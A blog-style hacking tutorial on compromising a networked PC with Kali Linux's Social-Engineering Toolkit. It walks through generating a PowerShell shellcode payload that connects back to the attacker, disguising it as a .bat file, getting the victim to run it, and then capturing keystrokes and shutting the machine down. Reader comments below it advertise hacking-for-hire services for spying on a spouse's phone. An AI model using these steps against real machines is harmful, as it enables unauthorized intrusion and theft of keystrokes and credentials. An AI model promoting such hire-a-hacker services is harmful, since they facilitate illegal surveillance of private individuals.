HOW TO HACK ANY PC CONNECTED TO THE NETWORK USING KALI LINUX

Kali linux is one of the biggest and popular distros from linux company with almost 600 penetration testing and hacking tools .

Make kali linux iso live bootable click here .

HOW TO HACK ANY PC CONNECTED YOUR NETWORK USING KALI LINUX .

Switch to your linux machine and goto

Applications > Exploitation Tools >  social engineering toolkit

 select the first option 1) Social -Engineering Attack  hit enter 

Then select option 9) Powershell Attack Vectors  hit enter


Then select option 1) Powershell alphanumeric shellcode Injection hit enter.
In the next step you need to type your ip address youcan know your ip address by typing the command ifconfig and hit enter mine is 192.168.0.103 i'am connected to Ethernet so my ip address is in eth0 .



Type that in LHOST : 192.168.0.103  
hit enter
Then type LPORT : 443 hit enter



Then copy the address mine is /root/.set/report/powershell/
 
Then type yes and hit enter
<open an new terminal >

Type in cd /root/.set/report/powershell/  to move into the directory hit enter


Then lsto list the items
Copy the file x86_powershell_injection.txt
Then type cp x86_powershell_injection.txt ~/Desktop/ to save the file  into desktop


And Rename that as .bat file



Put that into victim's pc.

It'll look like this .


Double click on the .bat files it'll look this .


Go to your old terminal of social engineering type help see options what you can do with it .
I'll give you some examples of the .
type in keyscan_start and hit enter to start the key scan i'll copy all keystokes on the victims pc .



 
Type in
keyscan_dump and hit enter to get all the keystokes.



type in shutdown to shutdown victims pc .




NOTE:
  • This works only when victim's pc and your machine is online .
  • when you type shutdown your sessions will close 
  • If that was done need to do the step once again to get the victim into control.

Comments

  1. My wife was putting up some attitude and acting strange,and we have been married for eight years,I explained my problems to my friend and he recommended brillianthackers800@gmail.com,I sent him a mail explaining my situation to him and he helped me hack into her phone,Walt sent me a WhatsApp conversation between my wife and her concubine which she told him everything about me and our marriage and he also recorded a call conversation between she and her concubine talking about how they were going to kill me and take my money and properties,I took this to court and I won the case,they were locked up in prison all thanks to Walt who saved my life through his hacking experience,every dollar I spent on this job was worth it,message him and he will help you with your problems.

    ReplyDelete
  2. Hello everyone I want to introduce you guys to a group a private investigators who can help you with information you need in any situation in life and they are ready to follow you step by step until your case is cleared just contact +17078685071 and you will happily ever after
    Premiumhackservices@gmail.com

    ReplyDelete

Post a Comment

Weekly Posts

HOW TO CRACK MAIL PASSWORDS USING HYDRA ON KALI LINUX .( GMAIL , YAHOO , LIVE) /bruteforce method .

How to crack wpa/wpa2 using crunch